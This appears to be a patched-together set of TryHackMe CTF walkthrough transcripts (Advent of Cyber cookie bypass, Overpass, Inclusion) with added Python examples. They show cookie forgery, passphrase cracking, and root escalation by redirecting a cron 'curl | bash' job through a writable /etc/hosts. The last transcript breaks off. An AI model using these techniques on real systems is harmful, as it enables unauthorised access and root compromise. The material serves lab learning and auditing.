So, all right, so we have some operations or some teams here that seem to be either responding or not responding. I'm assuming this green is good as a status, red is not, and yellow could be something else. I know these actions, I don't know what those are. Let's, let's go back to the room first, see what we're doing here. Team environment is not responding: that is HR. Could submit that. Team environment has a network warning: oh, that's Finance. So, hey, listen, I, I, I might have just steamrolled over probably the most important part. What we did just then when we manipulated that cookie is ultimately an authentication bypass, and that's the danger, right? When, when you either know someone else's cookie or you could figure it out because it's represented in such a weak and easy way. Like, you shouldn't find yourself with web servers that will just have JSON-encoded data that you could easily manipulate and tinker with. We didn't have to know the admin password, we didn't have to change or modify our permissions; we literally just changed our name to admin, and that's a weakness, that's a serious flaw from the web server's perspective. Us as the client, us as the, you know, acting as the adversary, putting on our hacker hat, that's something that we could use and abuse. But this is the learning point, this is the value: when we kind of see, hey, JSON in the cookie, we can manipulate and change that cookie, and ultimately you have that power even as the client, even as the end user. That's not a server-side thing; you can change that, so there's the danger in that. All right, hey, we've got all of this figured out here. Sorry, it looks like it is the Application operation, or that team, that is having trouble here with their connectivity. Looks like I can click on stuff but it doesn't do anything; I guess that's, I guess that's the speed test. But hey, let's go and answer that: Application is the team that's having a bad time. And if you want to learn more about any authentication bypasses
we should just trying out this room application bypass tasks yet released each day and progressively harder yep kind of as we knew from yesterday come back tomorrow for day three's task where namsack will be recording a video walkthrough ooh, he's quite a fellow he's quite a handsome man that's gonna be a ton of fun thanks so much for hanging out everybody this has been the day two task for the tri hack me advent at cyber 3 or 2021 addition and we learned a lot you know there's a lot of reading there's a lot of learning a lot of cookies http, stuff but boy oh boy did we get into some good stuff and i hope you had fun i hope this was educational i hope this was entertaining and i hope it's keeping you happy, healthy and excited for the tri hack me adventive cyber 3 we're having a ton of fun i'm pretty excited about all the upcoming rooms and there are just so much activities for the holiday season like everyone's doing a ctf everyone's doing a great game, everyone's doing some fun, cyber security learning and i guess we're just gonna have to completely neglect in our friends and family because i'll just we just want to hang out on the keyboard do some ctfs thanks so much for watching everybody i love you i'll see you in the next video take care。
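The cookie trick from the day two walkthrough, as an added example that is not part of the video or the room: the first three functions do exactly what was done in CyberChef (hex to JSON, change the username, JSON back to hex with no delimiter between bytes), and the signed-cookie functions show the server-side fix the video alludes to, an HMAC over the body that the client cannot recompute. The sample cookie contents, the secret and the function names are constructed for the example; the room's real cookie value is not reproduced.

```python
import hashlib
import hmac
import json

# Constructed sample in the shape of the cookie seen in the room (not the room's real value).
SAMPLE_COOKIE = {
    "company": "The Best Festival Company",
    "isRegistered": "True",
    "username": "John Hammond",
}


def encode_cookie(data: dict) -> str:
    """JSON -> hex string, no separator between bytes (CyberChef 'To Hex' with delimiter None)."""
    return json.dumps(data, separators=(",", ":")).encode().hex()


def decode_cookie(cookie_hex: str) -> dict:
    """Hex string -> JSON object (CyberChef 'From Hex' then read the JSON)."""
    return json.loads(bytes.fromhex(cookie_hex).decode())


def forge_admin_cookie(cookie_hex: str) -> str:
    """The authentication bypass: decode, swap the username for 'admin', re-encode.
    Nothing here needs a password or a secret; it only needs the cookie format."""
    data = decode_cookie(cookie_hex)
    data["username"] = "admin"
    return encode_cookie(data)


# Hardened alternative (an assumed design, not something the room implements):
# the server appends an HMAC tag keyed with a secret only the server knows.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


def sign_cookie(data: dict, secret: bytes = SERVER_SECRET) -> str:
    body = encode_cookie(data)
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_cookie(cookie: str, secret: bytes = SERVER_SECRET):
    """Return the cookie's JSON if the tag is valid, otherwise None.
    The tag is checked before the body is parsed, so tampered input is never decoded."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return decode_cookie(body)


def tamper_signed_cookie(cookie: str) -> str:
    """What the attacker can still do against the signed form: edit the body, keep the old tag."""
    body, _, tag = cookie.rpartition(".")
    return forge_admin_cookie(body) + "." + tag


if __name__ == "__main__":
    weak = encode_cookie(SAMPLE_COOKIE)
    print("forged username:", decode_cookie(forge_admin_cookie(weak))["username"])
    print("signed + tampered accepted?", verify_cookie(tamper_signed_cookie(sign_cookie(SAMPLE_COOKIE))) is not None)
```

The hex cookie is accepted by the server as-is, so `forge_admin_cookie` is a complete bypass; against the signed variant the same edit invalidates the tag and `verify_cookie` returns `None`. Signing stops tampering but not replay or disclosure, so a real session cookie should also be opaque (a random session id looked up server side) and marked `HttpOnly` and `Secure`.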

Hello, everybody, my name is John Hammond. Welcome back to another YouTube video. We're still looking at some TryHackMe, so let's hop on over to my screen and get to it. I want to showcase the Overpass room, because I just kind of found it and I thought it was really interesting, a neat idea. I also saw there is Overpass 2 that is out right now, and I want to pour into that, but first we've got to get through the starting things. So the theme, or the kind of prompt, for this box is: what happens when some broke computer science student makes a password manager? I have already submitted flags for this, so please forgive me that those are visible there, but we'll dive into how to get to those and find them as we always do. It says obviously it's a perfect commercial success whenever computer science students try to make a password manager, and there's also a little easter egg: they say there is a TryHackMe subscription code hidden on this box, and the first person to find and activate it will get one month's subscription for free; if you're already a subscriber, you can just give the code away and do some good stuff. But that has already been claimed; this room is about a month old. I realize my face is kind of in the way, so you can't see that mess up there, but anyway.

We have our machine IP address, it's up and it's running, and I'm connected to the VPN, so let's get started and try and work with it. I will make a directory, youtube/overpass, so we have a place to work, and I'll get started with an nmap scan. Well, we kind of put together our notes document, so: nmap -sC for default scripts, -sV to search versions, -oN so I have nmap output in a simple nmap format, and of course I'll paste in the IP address. All right, while that's running, let's make a simple README file so we can kind of keep track of things. I tend to do that just because it's good practice. Sometimes while I'm doing this video I might just sort of forget; please forgive me. It is currently August 18th, 2020, and I'll slap my name in there, maybe. If you just end up throwing this in GitHub or something, you're just sharing your notes in your repository, who knows what you're working on. We'll just go ahead and copy these prompts here, slap them in, good enough, easy peasy. I realized there is a TryHackMe API that you could use, it's like a library in Python, and I need to tinker with that because I want to write a script that could do something like this, for larger rooms that have more information in them, because that way you'll just automatically have this README and you don't have to really work with much.

We've got some interesting stuff open; our nmap scan is up and accessible, so let's check that out. Looks like port 22 open, so classic SSH, looks like it's running on Ubuntu, and port 80 HTTP: it's Go. Interesting, you don't often see that, very cool. Okay, looks like that's it, looks like we only have those two ports. Just to be safe, let's turn off those safe scripts, or whatever those are, and let's run our all-port scan with -p-. There we go, let's get that started, and let's explore that web page; well, we know that that's a thing. All right, just opening up the IP address in our web browser, it says "Welcome to Overpass, a secure password manager with support for Windows, Linux, macOS and more." This is interesting, because you have an actual, relatively somewhat of a web page here. "People use the same password for multiple services; if you're one of them, you're risking your accounts being hacked by evil hackers. Overpass allows you to secure different passwords for every service, protected using military grade cryptography to keep you safe." Oh yeah, okay! "Passwords are never transmitted over the internet in any form. Unlike other password managers, Overpass does not store your passwords... Download Overpass today." All right, let's check out the source; I just hit Ctrl+U on my keyboard to do that. Looks like they are loading some local JavaScript and console.log "hello world", so if I were to go back to the page and check out the console tab, yep, you can see that guy right there. Nice, cool, great! I'm also going to take a look at the CSS file in case they hide anything in there; I think that's kind of good practice, just something good to do. Images I'm not extremely concerned about; if we kind of run out of things to do we could do cheesy stego on that, or some other reconnaissance. But, oh, there's an HTML comment here: "Yeah, right! Just because the Romans used it doesn't make it military grade. Change this." Oh, okay! Romans using secure cryptography, that hints towards ROT13 and Caesar ciphers, right? So, okay, that's clearly not incredibly strong cryptography.

There's a downloads page, so let's go check that out, hop on over here: "Stay safe against hackers, use Overpass." Oh, and they have pre-compiled binaries and they have the source code. Nice, okay! Anything else in this Overpass? Go build scripts; these are all in a specific directory. Oh, what's the About Us page? Sorry, before I forget, I just kind of want to keep looking around. Anything here in this source? Nope, nothing hiding. Oh, I like that Szymex is in there, Ninja, cool! Oh, this is really cool, all the TryHackMe guys, I love it. Great, okay! Let's take a look at this code that they're showcasing here, source code and build script. Let's look at this thing. I already have these files downloaded, that's embarrassing, they're still in my downloads folder, who cares. Illusion, art, artifice. Let me make a directory for source and let's move downloads/overpass.go... yeah, stop, go! Sorry, into here. Same thing with build; I still have the binary itself, I gotta say, should put that in here as well. So let's take a look at those.

Let's take a look at the source code, overpass.go, and it's written in Go, kind of neat. I wish I were smarter in Go; I wish I could write Go as well as I could write Python, because that language is crazy cool. It's able to do stuff everywhere, other than the scripts and binaries being like megs in size, but okay. It looks like a password entry is a structure, so it has a name, a password, and a function for ROT47. Excellent! "The secure encryption algorithm, blatantly ripped and stolen from this URL." Okay, incredible! I will press the "I believe" button on that and say that that just does regular ROT47, at least for now. If it does do anything else and we just don't see it, then whatever, we don't need to worry about it, we can go ahead and reverse engineer it as needed. Save creds to file: where does it save all these, does it have a path, like a default path? Load creds from file, JSON. Input: oh, Python-style input function, neato. Search password for service. I'm just slowly, cursorily looking through these to get an idea of what these functions are and what they do. I don't think there's any obvious, glaring, okay, bad eval or unsafe function that might be sticking out, but it's good to peruse through this. Delete password from service, how does it do that? Pass not found. Print all passwords, and it just loops through all of them, okay. Oh, the creds path is in the home directory, .overpass, good to know, and that's probably stored in some marshalled, or whatever, JSON format, as we saw up top. Okay, and we have this menu here, just a little command line interface to answer or select one option; that's easy enough. They did have the binaries, so we could just kind of tinker with it and play with it. Let's do that. Oh, what was that build script? Sorry, before I forget: the build script. A set of GOOS values, which is always fun, that's in Go, setting an environment variable for how to install it and work with it, overpass.go, it just does it for literally everything, that's awesome. And echo, date, "hacker builds completed"; oh, it's just command substitution in there to get the date. Maybe we could potentially abuse that at some point. Obviously we've just downloaded this locally, but we are supposed to get into this box somehow, so we should mess with that. All right, whatever. Let's take a look at the binary. You can download it, I have already downloaded it, I'm just going to grab the Linux one. It didn't download, because I didn't click it hard enough, apparently, but I still have the binary anyway, so let's move that in here and let's look at it. I realize typing at the bottom of my screen might annoy you, sorry. That is executable, overpassLinux, and run it, there we go. Let's just hop over into another window up here so I'm not at the very bottom of my screen, because I heard some people say "hey, I don't like to read it because the YouTube player stuff gets in the way." So here we go: "Welcome to Overpass. Retrieve a password for a service." One, john, that's it, it died. Okay, retrieve all passwords: john. Oh, again! This also still exists because of my home directory .overpass; man, I'm really ruining the illusion here. Right, so this is ROT47, this is the weird notation that it's apparently encrypting and storing all this stuff in. Keep note: you can normally identify ROT47 by the weird, random, sheer amount of punctuation marks. And I'll just do a simple, stupid online ROT47 decoder, slap that in, decrypt, okay. So now you might be able to see: I have john, john; john is the name and john is the password, super boring, but that's how it would simply work. Oh, okay!

So now that we've looked at this code, and we've looked at this source, we've looked at this build script, we looked at the executable, I don't see a whole lot else here. And since they give us an actual website, sometimes you're like "oh wait, whoops, I spent so much time exploring a website that I forgot to run my regular, normal enumeration procedures," so don't forget: fire up that simple nikto. I'll tee that to nikto.log, if I can type right. Also do the same with a little gobuster: we'll do a gobuster dir -u with that URL, and we'll use -w for my wordlist, and I store directory-list medium in my /opt directory, and we will fire that off. Okay, we'll see what that comes up with. Realistically, we probably should have been running that while we were looking for... oh, did it fail? And that HTB client, is that the right... that is the right IP address. Can I ping that thing? Oh, sorry, yep. Is it just because nikto is working? That's funny, error running gobuster. I don't know if you can see that typo there. Nice, let's do it again. Maybe I'll stop nikto, let gobuster have a little bit of precedence here. Still dies. All right, let me pause and figure this out. Well, you know what, it might be that annoying nmap scan beating it up. Maybe I don't need a trailing forward slash; let's see if that will work. There we go, all right. Turning off the nmap scan, just kind of let it do its thing, that's fine. /aboutus, /downloads, /img, we saw that already. Oh, a /admin, that is something we had not seen or looked at before, so let's hop over there: /admin, "Administrator access: please log in to access this content." Okay, we could try the basic, stupid admin/admin, that doesn't work; admin/password, that doesn't work. We could try the basic, stupid SQL injection, ' or 1=1, oh, using two hyphens to do a SQLite comment, using a hashtag, or an octothorpe, to do it with the MySQL syntax, switching it up to a single quote or a double quote for strings. None of those work.

Okay, is there anything on this page? It's interesting. Body on there, another CSS file, okay, nothing there, interesting anyway. main.js as usual, oh, but there's a login.js and a cookie.js, that's peculiar. What is that cookie? Oh, okay, that's just a regular minified library, used in another place, js-cookie, MIT license, so that might not be too interesting for us. How about login.js? Okay, yeah, this looks custom, this looks like it's just written specifically for this. So we have a postData function with a URL and data: async, awaits fetching a URL with the POST method, CORS, headers, URL form-encoded, follow a redirect, get the body, and then return the response. Okay, sometimes it's not always JSON, that's peculiar. encodeFormData, that looks like it just kind of puts it into, yeah, okay, POST data format. onload, which we saw in the source code would run as soon as the page loaded, okay, would look for a login, and on you clicking submit it will run the login function rather than submitting the form as HTML normally would. So this login function is where all the interesting stuff happens. Okay, we have a username box, which is getting all the information out of that field, same thing with password, same thing with loginText, content equals nothing. creds is just going to be a little dictionary, associative array, hash table, with the values pulled from the fields, and we will post to that resource /api/login with our creds, and it'll get a constant, statusOrCookie, with a response object from that postData function returning. Okay, and then we do a check, in client-side code, in JavaScript: so if the statusOrCookie is equal to "Incorrect credentials" then we know that failed, gotcha, or otherwise, huh, oh, we set a cookie: SessionToken, statusOrCookie, window.location. Okay, so it brings us to the exact same page, it just has a cookie working. But that's interesting, because what could that value be? Obviously, if it's just not "Incorrect credentials", it could just be literally anything, right? Like, what could that be? If we were to set that, would that work if we just set that to anything, literally? We could control that, because a cookie is something we can tamper with just as easily.

Let me try that in curl. So let's make gobuster shut up, and let's try to close out some of these, because we don't need these to take up the entire terminal for us. Let's hop over to the original page, and let's try and curl that, just to get it in the command line. I don't have a cookie editor thing quickly installed, like a cookie editor browser plugin or manager, on my Firefox or my Chrome here, so I'm just going to use a simple curl for a proof of concept. I'm going to specify -H to use a header; will that work? I'd have to use a Set-Cookie thing, um, I think curl just has a --cookies... yeah, no, cookies is unknown, is it --cookie? Yeah, cookie requires a parameter, okay. Quick troubleshooting to see if that command line option even actually exists. So we'll specify, what was the name of that, SessionToken, yeah, we'll set it equal to literally anything, and we have a private key. Okay, so I guess that did work. Since it's all JavaScript we could probably do the exact same thing; this code would run in the context of this window, because that's pulling in that cookie.js. So if I were to open up the console again and just slap this syntax in: statusOrCookie is not defined, that variable, we could just set, once again, literally anything. Now if I refresh this page, that cookie is set, and we can see it in our browser. "So since you keep forgetting your password, James, let's set up SSH keys for you. If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you. Also, we really need to talk about this military grade encryption." Nice, okay, so here's the private key. Reading that prompt, it sounds like we need to crack a password for this thing.

So let's make a directory for SSH and slap this in here as an id_rsa. Don't forget to include a... excuse me, include a newline at the very, very end of your private key; that can trip you up sometimes if it says something like "unknown format". Let's mark it as our own, so chmod 600, and I'm assuming we'll have a username james, because it references this individual James here. So let's grab that IP address and try to ssh -i with that id_rsa, james at this IP address, not a URL, please, thank you, and see if that will work for us. Yep, I'm totally cool with connecting to it, let's do it. We need a passphrase, okay, let's do that with John the Ripper. So I have /opt/rockyou.txt, I have this regular wordlist for brute forcing that's just in my /opt directory; there's tons and tons of stuff. And I also have John the Ripper, so that's /opt/john-the-ripper/run/john. If you don't have that installed, go grab it off of their GitHub repository, it's magnumripper/JohnTheRipper, it's a community edition, Jumbo John I think it's called, and then just go into the source directory, do a ./configure, and do a make and install, and it'll build it all for you, so super easy, super cool. Let's run john on... actually, we need to convert this into the specific format, right, because John will offer some scripts like ssh2john that will take a file format and kind of convert it into something that John the Ripper could work with. So I'll just make a forjohn.txt, that's good. Now, with that done, we can run john on that forjohn.txt, but let me specify the wordlist here: I'll use /opt/rockyou, that wordlist for him, and I'll run forjohn and let's see if he gets a hit. And he does, okay, so james13 is apparently that password. Cool, cool, that's good fun. What are you doing over there, John the Ripper, what are you doing? Let's just stop that, actually, because I don't need this extra session when I still have that one; connect to it, please, and the password should be james13. Good, good, good, I typed that right, let it connect. Okay, let me pause this video real quick. Okay, that took forever, but I'm on the box.

So, okay, in our home directory as this James user I can see a user.txt file, which we will cat out here, cat that out, crap that out, all the words, and that will give us our points for that user. Though we also have a little todo.txt, which is interesting: "Update Overpass' encryption, Muirland has been complaining that it's not strong enough. Yeah, right. Write down my password somewhere on a sticky note so I don't forget it. Wait, we make a password manager, why not just use that? Test Overpass for macOS, it builds but I'm not sure it actually works. Ask Paradox how he got around... how we got the automated builds working and where the builds go; they're not updating on the website." Ah, automated build script, is it still... is it running here? Because I know we had that thought, we could maybe get in the middle of that date command running or something. Not okay, whatever. Let's see if we have a password: he mentioned he has been using the password manager, and we have an .overpass file, okay, so that hidden directory again, right?

So let's cat out that .overpass and we see his information. It's simple ROT47, so I had that ROT47 decoder online, I could just once again slap that in, go: name is "System", pass "saydrawnlyingpicture", okay. Whatever "System" is referring to, like, this system, like, would I be able to sudo? Take that out, like, is that his password? Paste that in, okay, that is his password, but James can't run sudo. Boring, okay. Um, we could do regular enumeration: what else is there, any other users we could get into? There's a tryhackme user, nope, can't get into that; anything in root? Nothing particularly interesting. Okay, so let's throw LinEnum or LinPEAS in here and let's see if we can find a way around this. Um, I'm going to use gwake, which I use as part of my cheesy "poor man's pentest" framework ideas, because I would like to be able to upload or download a file, right? So I have these commands, like upload file with netcat, or like wget, or other methods to get a file on the box. Normally, if you're using this with pwncat, it's much better, and we could get a pwncat shell if we wanted to, but I'll just showcase this one, because I think LinPEAS might highlight some things a little bit better for your learning and for us to walk through this together. So let me show you what that is before I just totally say that this is what we're going to do and then you don't understand any of it. So let's fire that up in Sublime Text. I'm using my pmp, or /opt/poor-mans-pentest, functions, and that will grab my IP address, my local host IP address, so it knows... or my tun0 IP address, excuse me, so it knows how to reach the VPN and that box back and forth, a random port, it'll specify a filename out of this little $1, excuse me, out of this command line argument we pass in, we'll have gwake, which is how I'm invoking this, and we'll get focus back to our actual window, and we will run a netcat listener serving this file on our host, and then we'll send the command, with xte or X automation, to simulate typing in on the victim this netcat command to download and pull this file in. So that's all that that's doing, this silly poor man's pentest, because I'm automating keystrokes inside of my reverse shell so I can, quote unquote, script inside of it. You don't have that real functionality, but pwncat will let you do that, so I would always recommend to use pwncat, but I guess I'm just not in this case. Stupid me. Let's upload LinPEAS, there we go, that slapped in. I'm going to give it a second, I'll check, okay, yeah, gwake says it's got everything, it's done, so let me close out of that. And it just threw it in /dev/shm, shared memory, because I like to hide in there. file says it is a shell script, so let's run it, let's ./... okay! Mark it as executable. We'll get a ton of stuff.

I'm using one of the later versions of LinPEAS, I think, or at least newer than I had run previously, because now it'll cache directories and be able to figure out a lot of good stuff. So we'll let that go and then we'll start to look through it; I guess we can kind of look through it as it's going, so nothing wrong with that. LinPEAS: we have ping, we have netcat, incredible, old sudo version, good to note. Kind of exploring and seeing if there's anything that just jumps out. LinPEAS is great, because it'll color-code things that are potentially, or very, very likely, a privilege escalation utility. Useful software: we have a lot, Python, we have... all these things, we have compilers, goodness, Ruby's running some stuff. Cron: crons in there, why? They run a cron; I wonder if that's that automatic build script. Cron jobs has some, yeah, those are all defaults, they look like defaults. Oh, what is that line? So that's cron syntax: every minute of every day, every hour of every day, every month, as the user root. Interesting, we will curl overpass.thm, looks like a little hostname or domain name, /downloads/src/buildscript.sh, and pipe it to bash. Whoa, okay, funky. That is an obvious and egregious method that we could abuse to privilege escalate, because if root's running that, then we'll get code execution as root if that's just getting piped into bash. Can we control that, though? That overpass.thm, where are they setting that domain name? That's normally in /etc/hosts; do we have write access to /etc/hosts? That's normally a weird thing. Hostname, okay, yeah, we can see that hostname; hosts in DNS, that's definitely the output of our /etc/hosts file, but can I write to that? That's odd. Listening ports, superusers are root, yep, okay, tryhackme looks like tryhackme has a lot of privileges, he's in sudo, blah blah blah. Our rsync stuff, possible private keys, yep, we found those, we have those. SUID files, SGID files, nothing stands out to me, capabilities, weird to see a CD-ROM file, okay, modified, interesting, oh, GPG stuff, that's peculiar, find a bunch of log files, backup files, all hidden files, there's a lot in here, whoa, okay, I don't need to see all that. Interesting, right: interesting writable files owned by me, writable by everyone, that are not in my home directory: /etc/hosts is in the list. Okay, okay, cool. So if we can modify /etc/hosts, what we could do is we could act as that curl command, right, that was in, oh boy, I gotta find it again now: it was curling overpass.thm/downloads/src/buildscript.sh piped to bash, and that would run every minute, right? So if I were to try to do that now it looks like it's getting, okay, the one off of this website, but let's modify that. So right now, let me change this profile: this will be the victim that we're in, and this will be my server, my machine, because I want to know my IP address, if I can type: tun0, ip address show, my IP address there. And let's modify that /etc/hosts file, because we do have write access in there, supposedly, and let's change the overpass.thm location and make it my address, yeah. So that way, if I were to ping overpass.thm, you can see now I'm actually reaching my attacker machine. Great, so let's make a little directory for ourselves and we'll fake and simulate, pseudo-create, the same file structure as what that command is expecting in cron as it's running every minute. So let me make, let's see, it's downloads/src and then we have the script itself, so let's mkdir -p to make all of those directories, we'll hop in there, and let's create a simple bash script, buildscript.sh, that will be #!/bin/bash, there we go, and we can have this do literally whatever we want, because that will be executed through bash. I think the easiest way to give us accessible root privileges is to make the bash binary set-UID, so that way we'll be able to invoke it and keep our root privileges. So right now, if you check out the permissions on /bin/bash, sure, it is owned by root, executable, but it doesn't have the sticky bit set, or it's not set-UID. Using that, we could just invoke it with -p and that way we could maintain root readily. You could do other things, like a callback, a reverse shell, or whatever you want, but I want to keep it in this for simplicity's sake. All right, let's hurry it up, because we're getting to a really long video and it just really doesn't need to be. So let's get back to the root of this directory, right; let's actually watch this ls -la and see when it's going to hit. Looks like I still have about half a minute to go, and this will, we know from the crontab, this will happen on the clock, every minute on the minute. So let's fire up my HTTP server, and that's going to listen on port 8000 by default, so if I want to specify port 80 I could specify that as a last argument, but we need root privileges to do that on my Ubuntu system, so let me sudo python -m http.server 80, type in my password as fast as I can, great. Now we are very, very close to the end of the minute, so we should see a GET request come through on our attacker machine, done, and we should see this switch to an s, or a sticky bit, set-UID. All right, so let's stop watching that, and let's /bin/bash -p, and now we're root. Very, very cool. We were just abusing that little curl command that's in cron, that is running commands as root and is pulled from an external resource, or at least we can control where that resource is, because it's in the /etc/hosts file that we have write access to. So we could hop on over to /root and we could simply cat out that root.txt and be done with it. Nice, nice, nice.

The easter egg, if you wanted to, you could go find that. Well, careful there, John. If you wanted to, you could go check out tryhackme, that user account that we saw; he does have an Overpass account, so we could cat out that file and see what other information that might have. As usual, it's just ROT47, so we could go hop over to this little decoder, decrypt that, and kind of easy: there's a little TryHackMe subscription code, but someone has already found that, right, no sense trying to submit it. But very, very neat, very, very cool, very, very fun. I really liked the idea of this box, and that was kind of fun, and it was cool to work through some of those, and I like that simple /etc/hosts trick. So I hope you guys thought that was also very neat, very enjoyable. Take good notes, if that's something that you want to do; as usual, I started a README file and then did nothing with it whatsoever. But hey, thank you guys so much for watching. I really hope you enjoyed this video. If you did, please do press that like button, do the YouTube algorithm things, leave me a comment, hopefully subscribe. Thank you, you guys are the best. Thanks so much for watching, I'll see you in the next video. Take care.
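The "military grade" encryption from the Overpass walkthrough, as an added example that is not the room's code or John's: ROT47 rotates every printable ASCII character (codes 33 to 126) by 47 positions within that range, so applying it twice gives the plaintext back and no key is involved, which is why an online decoder, or the few lines below, read the .overpass file straight off. The file layout used here (a JSON list of objects with "name" and "pass" keys, as the Go struct in the video suggests) and the sample credentials are assumptions for the example.

```python
import json


def rot47(text: str) -> str:
    """ROT47: shift each printable ASCII character (33..126) by 47 within that range.
    Characters outside the range (space, newline, non-ASCII) are left untouched."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)
    return "".join(out)


def encode_overpass_file(creds: list) -> str:
    """What the password manager writes to ~/.overpass (assumed layout): ROT47 over the JSON."""
    return rot47(json.dumps(creds))


def decode_overpass_file(contents: str) -> list:
    """Recover the plaintext credentials from a ~/.overpass file. No key, no secret, just ROT47."""
    return json.loads(rot47(contents.strip()))


def looks_like_rot47(contents: str, threshold: float = 0.5) -> bool:
    """Heuristic from the video: ROT47 output is dense with punctuation, because letters
    (97..122) land on symbols (50..75 and 33..47 after wrapping) and vice versa."""
    printable = [c for c in contents if 33 <= ord(c) <= 126]
    if not printable:
        return False
    punct = sum(1 for c in printable if not c.isalnum())
    return punct / len(printable) >= threshold


# Constructed sample, not the room's real file or credentials.
SAMPLE_CREDS = [{"name": "john", "pass": "john"}, {"name": "mail", "pass": "s3cr3t-Pass!"}]

if __name__ == "__main__":
    stored = encode_overpass_file(SAMPLE_CREDS)
    print("on disk:", stored)
    print("ROT47 guess:", looks_like_rot47(stored))
    for entry in decode_overpass_file(stored):
        print(f"{entry['name']}: {entry['pass']}")
```

Because ROT47 is its own inverse and keyless, anyone who can read the file (James, root, the cron job, a backup) has the passwords; a real password manager encrypts with a key derived from a master passphrase, so file access alone is not enough.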
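The privilege escalation in the Overpass walkthrough, as an added audit example that is not the room's code or John's: a root cron job that pipes a download into bash is only as trustworthy as the name resolution for the download host, and on that box /etc/hosts was world-writable. The functions below parse crontab lines, spot a fetch piped into a shell, check whether the host is resolved by a writable hosts file, and build the hosts line an attacker would drop in. The crontab and hosts contents are constructed samples in the shape of what the video shows; the attacker address and function names are assumptions.

```python
import os
import re
import stat
from urllib.parse import urlparse

# /etc/crontab line: five schedule fields, a user, then the command.
CRONTAB_LINE = re.compile(r"^\s*(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
# The right-hand side of the pipe is a shell.
SHELL_RHS = re.compile(r"^\s*(?:/bin/|/usr/bin/)?(?:ba|z|da)?sh\b")


def parse_crontab(text: str):
    """Yield (user, command) for every job line, skipping comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue
        m = CRONTAB_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def extract_fetch_host(cmd: str):
    """If cmd is 'curl|wget ... <url> ... | sh', return the URL's host, else None.
    A bare 'host/path' (no scheme, as in the video's cron line) is treated as http."""
    if "|" not in cmd:
        return None
    left, right = cmd.split("|", 1)
    if not SHELL_RHS.match(right):
        return None
    tokens = left.split()
    if not tokens or os.path.basename(tokens[0]) not in ("curl", "wget"):
        return None
    for tok in tokens[1:]:
        if tok.startswith("-"):  # flags; a flag's separate value would be misread, acceptable here
            continue
        url = tok if "://" in tok else "http://" + tok
        host = urlparse(url).hostname
        if host:
            return host
    return None


def parse_hosts(text: str) -> dict:
    """/etc/hosts -> {name: ip}, honouring '#' comments and multiple names per line."""
    table = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        for name in parts[1:]:
            table[name] = parts[0]
    return table


def hijackable_jobs(crontab_text: str, hosts_text: str, hosts_mode: int) -> list:
    """Report every job that pipes a download into a shell; flag it as hijackable when the
    host is pinned in /etc/hosts and that file is world-writable (the Overpass condition)."""
    hosts = parse_hosts(hosts_text)
    writable = bool(hosts_mode & stat.S_IWOTH)
    findings = []
    for user, cmd in parse_crontab(crontab_text):
        host = extract_fetch_host(cmd)
        if host is None:
            continue
        findings.append({"user": user, "host": host, "cmd": cmd,
                         "hijackable": writable and host in hosts})
    return findings


def rewrite_hosts(hosts_text: str, host: str, new_ip: str) -> str:
    """Return hosts content with `host` pointed at `new_ip` (what the attacker writes)."""
    out = []
    for line in hosts_text.splitlines():
        parts = line.split()
        if parts and not line.lstrip().startswith("#") and host in parts[1:]:
            rest = [n for n in parts[1:] if n != host]
            if rest:
                out.append(parts[0] + " " + " ".join(rest))
            continue
        out.append(line)
    out.append(f"{new_ip} {host}")
    return "\n".join(out) + "\n"


# Constructed samples in the shape of the files on the box (not copied from it).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
"""
SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.0.1.1 overpass-prod
127.0.0.1 overpass.thm   # pinned locally, so whoever can edit this file owns the download
"""

if __name__ == "__main__":
    for f in hijackable_jobs(SAMPLE_CRONTAB, SAMPLE_HOSTS, 0o666):
        print(f)
    print(rewrite_hosts(SAMPLE_HOSTS, "overpass.thm", "10.8.0.2"))
```

On a real host, feed it `open("/etc/crontab").read()`, `open("/etc/hosts").read()` and `os.stat("/etc/hosts").st_mode`; the same check is worth running over /etc/cron.d/* and root's crontab. The fix is not just `chmod 644 /etc/hosts`: a root job should never execute content fetched at run time, and if it must, it should verify a signature or pinned hash before passing anything to bash.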

what's going on everybody my name is john hammond this is another tri hackney video and i want to be showcasing the inclusion room which is just a beginner local file inclusion challenge that we can go check out it is free you don't have to be subscribed accessor's room so we'll go ahead and join it and deploy our machine so i will go ahead and set up some rooms here for this i'll go ahead and say inclusion will have its own directory i'll make a simple n map directory and kind of get started with an n map skin while this guy is running so i will n map c s v n n map initial and i'll paste in the ip address there i'll also go ahead and export that ip address there and it probably still taking its time to spin up so let me actually verify that i can ping him give him a little bit of time whatever, let's go ahead and sort of read me file if he's still taking his time to cook, we'll call that inclusion just for our notes and i'll go ahead and export that ip address to that they already have that yeah i did have that copy pasted in my clipboard there so let's create some skeleton stuff for our own documentation and our own notes so we can work with this look like he's up okay, so now let's go ahead and start the n map script again it says deploy the machine and start numerating roger that no answer needed for that task one seemingly let's go check out what task two has us do user flag and root flag so simple stuff looks like no guidance just jump in and beat the machine up so root flag let's get a section for n map scan let's take a look at what we have here once that loads considering this are talking about local file inclusion i'm gonna assume it's going to be asking us to work on a web page so let me fire that up another tab here that will not connect maybe it's not on port 80 old hosts your thing is down everything is down everything is closed that machine is up do i have multiple instances of openvpn running just one let's make sure tagpn is getting the way but 
